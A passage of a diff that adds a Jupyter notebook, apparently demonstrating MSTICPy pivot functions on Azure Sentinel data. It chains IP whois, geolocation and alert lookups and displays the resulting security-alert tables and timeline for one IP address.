+       "2  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "3  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "4  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "\n",
+       "                 ProviderName VendorName  \\\n",
+       "0  Threat Intelligence Alerts  Microsoft   \n",
+       "1  Threat Intelligence Alerts  Microsoft   \n",
+       "2  Threat Intelligence Alerts  Microsoft   \n",
+       "3  Threat Intelligence Alerts  Microsoft   \n",
+       "4  Threat Intelligence Alerts  Microsoft   \n",
+       "\n",
+       "                       VendorOriginalId                         SystemAlertId  \\\n",
+       "0  91d806d3-6b6f-4e5c-a78f-e674d602be51  625ff9af-dddc-0cf8-9d4b-e79067fa2e71   \n",
+       "1  173063c4-10dd-4dd2-9e4f-ec5ed596ec54  c977f904-ab30-d57e-986f-9d6ebf72771b   \n",
+       "2  58b2cda2-11c6-42b8-b6f1-72751cad8f38  9ee547e4-cba1-47d1-e1f9-87247b693a52   \n",
+       "3  e945f91e-5726-4581-8564-4c04e5414a58  83a0e08a-1adb-ef75-1c56-f6c9ce25ca69   \n",
+       "4  a95aaf62-9628-418b-8f5f-0f1f26dcdc13  fde729f6-674b-997a-17eb-e4e7d2b3690d   \n",
+       "\n",
+       "  ResourceId SourceComputerId           AlertType ConfidenceLevel  \\\n",
+       "0                              ThreatIntelligence              83   \n",
+       "1                              ThreatIntelligence              83   \n",
+       "2                              ThreatIntelligence              83   \n",
+       "3                              ThreatIntelligence              83   \n",
+       "4                              ThreatIntelligence              83   \n",
+       "\n",
+       "   ConfidenceScore  IsIncident              StartTimeUtc  \\\n",
+       "0              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "1              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "2              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "3              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "4              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "\n",
+       "                 EndTimeUtc         ProcessingEndTime RemediationSteps  \\\n",
+       "0 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "1 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "2 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "3 2020-12-23 13:48:23+00:00 2020-12-23 14:08:16+00:00                    \n",
+       "4 2020-12-23 13:48:23+00:00 2020-12-23 13:53:47+00:00                    \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "\n",
+       "  SourceSystem               WorkspaceSubscriptionId WorkspaceResourceGroup  \\\n",
+       "0    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "1    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "2    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "3    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "4    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "\n",
+       "  ExtendedLinks     ProductName                     ProductComponentName  \\\n",
+       "0                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "1                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "2                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "3                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "4                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "\n",
+       "  AlertLink Status CompromisedEntity  Tactics           Type  \\\n",
+       "0              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "1              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "2              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "3              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "4              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "\n",
+       "                         SystemAlertId1  \\\n",
+       "0  625ff9af-dddc-0cf8-9d4b-e79067fa2e71   \n",
+       "1  c977f904-ab30-d57e-986f-9d6ebf72771b   \n",
+       "2  9ee547e4-cba1-47d1-e1f9-87247b693a52   \n",
+       "3  83a0e08a-1adb-ef75-1c56-f6c9ce25ca69   \n",
+       "4  fde729f6-674b-997a-17eb-e4e7d2b3690d   \n",
+       "\n",
+       "                                                                                   ExtendedProperties1  \\\n",
+       "0  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "\n",
+       "                                                                                             Entities1  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "\n",
+       "     MatchingIps  \n",
+       "0  [3.88.48.125]  \n",
+       "1  [3.88.48.125]  \n",
+       "2  [3.88.48.125]  \n",
+       "3  [3.88.48.125]  \n",
+       "4  [3.88.48.125]  "
+      ]
+     },
+     "execution_count": 50,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(10)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.tee(var_name=\"whois_df\", clobber=True)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"Geo Lookup\", cols=[\"IP\", \"City\"])  # << display an intermediate result\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\")\n",
+    ").head(5)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Add a display function"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(5)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"Geo Lookup\", cols=[\"IP\", \"City\"])  # << display an intermediate result\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\")\n",
+    "    .mp_pivot.display(title=\"Alerts Sample\", head=5) \n",
+    "    .mp_timeline.plot(\n",
+    "        title=\"IPs with alerts\",\n",
+    "        source_columns=[\"AlertName\", \"MatchingIps\"],\n",
+    "    )\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 52,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<h3>Geo Lookup</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>City</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Ashburn</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            IP     City\n",
+       "0  3.88.48.125  Ashburn"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Alerts Sample</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>AlertType</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>SystemAlertId1</th>\n",
+       "      <th>ExtendedProperties1</th>\n",
+       "      <th>Entities1</th>\n",
+       "      <th>MatchingIps</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-19 19:10:17+00:00</td>\n",
+       "      <td>Possible contact with a domain generated by a DGA</td>\n",
+       "      <td>Possible contact with a domain generated by a DGA</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Identifies contacts with domains names in CommonSecurityLog that might have been generated by a ...</td>\n",
+       "      <td>ASI Scheduled Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>2e06b22f-2022-4cc5-8db4-da726aaca8c7</td>\n",
+       "      <td>fdc54c12-efba-38b0-8379-f06d7fbfd34a</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d_8a369bd2-97b6-4fe2-922a-cd170faf25bc</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-19 13:04:59+00:00</td>\n",
+       "      <td>2020-12-19 19:04:59+00:00</td>\n",
+       "      <td>2020-12-19 19:10:17+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>CommandAndControl</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>fdc54c12-efba-38b0-8379-f06d7fbfd34a</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-01-15 09:32:56+00:00</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...</td>\n",
+       "      <td>ASI Scheduled Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>61c7e4cb-8a09-4b14-8876-ed01ba79cf97</td>\n",
+       "      <td>06c1a670-447a-5032-87d9-dadcc38c7f54</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d_ab8f7be2-4ada-4f9f-b8b7-5596cc80068d</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-01 09:27:50+00:00</td>\n",
+       "      <td>2021-01-15 09:27:50+00:00</td>\n",
+       "      <td>2021-01-15 09:32:56+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>SOC</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>06c1a670-447a-5032-87d9-dadcc38c7f54</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-01-15 10:32:56+00:00</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...</td>\n",
+       "      <td>ASI Scheduled Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>b3f1d5f8-a6b2-46e3-a479-3748d1dfb3f9</td>\n",
+       "      <td>8855a515-5f75-1917-e001-ab7c56fbe7b1</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d_ab8f7be2-4ada-4f9f-b8b7-5596cc80068d</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-01 10:27:50+00:00</td>\n",
+       "      <td>2021-01-15 10:27:50+00:00</td>\n",
+       "      <td>2021-01-15 10:32:56+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>SOC</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>8855a515-5f75-1917-e001-ab7c56fbe7b1</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-01-15 11:09:27+00:00</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...</td>\n",
+       "      <td>ASI Scheduled Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>60c18b16-17e4-48a2-b79f-6146c0412eb4</td>\n",
+       "      <td>4acbd9b6-77b9-6918-bae4-52dcc703e646</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d_cfb8a41c-dfb8-43e8-978e-3bec44cb62d2</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-01 11:04:21+00:00</td>\n",
+       "      <td>2021-01-15 11:04:21+00:00</td>\n",
+       "      <td>2021-01-15 11:09:27+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>4acbd9b6-77b9-6918-bae4-52dcc703e646</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-01-15 09:09:27+00:00</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Time series anomaly detection for total volume of traffic</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...</td>\n",
+       "      <td>ASI Scheduled Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>9f91a845-194f-4baf-a479-6d806dd314a8</td>\n",
+       "      <td>63d01128-c146-3470-c8d3-dc2e1258c6ab</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d_cfb8a41c-dfb8-43e8-978e-3bec44cb62d2</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-01 09:04:21+00:00</td>\n",
+       "      <td>2021-01-15 09:04:21+00:00</td>\n",
+       "      <td>2021-01-15 09:09:27+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>63d01128-c146-3470-c8d3-dc2e1258c6ab</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId             TimeGenerated  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-19 19:10:17+00:00   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d 2021-01-15 09:32:56+00:00   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d 2021-01-15 10:32:56+00:00   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d 2021-01-15 11:09:27+00:00   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d 2021-01-15 09:09:27+00:00   \n",
+       "\n",
+       "                                            AlertDisplayName  \\\n",
+       "0          Possible contact with a domain generated by a DGA   \n",
+       "1  Time series anomaly detection for total volume of traffic   \n",
+       "2  Time series anomaly detection for total volume of traffic   \n",
+       "3  Time series anomaly detection for total volume of traffic   \n",
+       "4  Time series anomaly detection for total volume of traffic   \n",
+       "\n",
+       "                                                   AlertName Severity  \\\n",
+       "0          Possible contact with a domain generated by a DGA   Medium   \n",
+       "1  Time series anomaly detection for total volume of traffic   Medium   \n",
+       "2  Time series anomaly detection for total volume of traffic   Medium   \n",
+       "3  Time series anomaly detection for total volume of traffic   Medium   \n",
+       "4  Time series anomaly detection for total volume of traffic   Medium   \n",
+       "\n",
+       "                                                                                           Description  \\\n",
+       "0  Identifies contacts with domains names in CommonSecurityLog that might have been generated by a ...   \n",
+       "1  Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...   \n",
+       "2  Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...   \n",
+       "3  Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...   \n",
+       "4  Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical...   \n",
+       "\n",
+       "           ProviderName VendorName                      VendorOriginalId  \\\n",
+       "0  ASI Scheduled Alerts  Microsoft  2e06b22f-2022-4cc5-8db4-da726aaca8c7   \n",
+       "1  ASI Scheduled Alerts  Microsoft  61c7e4cb-8a09-4b14-8876-ed01ba79cf97   \n",
+       "2  ASI Scheduled Alerts  Microsoft  b3f1d5f8-a6b2-46e3-a479-3748d1dfb3f9   \n",
+       "3  ASI Scheduled Alerts  Microsoft  60c18b16-17e4-48a2-b79f-6146c0412eb4   \n",
+       "4  ASI Scheduled Alerts  Microsoft  9f91a845-194f-4baf-a479-6d806dd314a8   \n",
+       "\n",
+       "                          SystemAlertId ResourceId SourceComputerId  \\\n",
+       "0  fdc54c12-efba-38b0-8379-f06d7fbfd34a                               \n",
+       "1  06c1a670-447a-5032-87d9-dadcc38c7f54                               \n",
+       "2  8855a515-5f75-1917-e001-ab7c56fbe7b1                               \n",
+       "3  4acbd9b6-77b9-6918-bae4-52dcc703e646                               \n",
+       "4  63d01128-c146-3470-c8d3-dc2e1258c6ab                               \n",
+       "\n",
+       "                                                                   AlertType  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d_8a369bd2-97b6-4fe2-922a-cd170faf25bc   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d_ab8f7be2-4ada-4f9f-b8b7-5596cc80068d   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d_ab8f7be2-4ada-4f9f-b8b7-5596cc80068d   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d_cfb8a41c-dfb8-43e8-978e-3bec44cb62d2   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d_cfb8a41c-dfb8-43e8-978e-3bec44cb62d2   \n",
+       "\n",
+       "  ConfidenceLevel  ConfidenceScore  IsIncident              StartTimeUtc  \\\n",
+       "0                              NaN       False 2020-12-19 13:04:59+00:00   \n",
+       "1                              NaN       False 2021-01-01 09:27:50+00:00   \n",
+       "2                              NaN       False 2021-01-01 10:27:50+00:00   \n",
+       "3                              NaN       False 2021-01-01 11:04:21+00:00   \n",
+       "4                              NaN       False 2021-01-01 09:04:21+00:00   \n",
+       "\n",
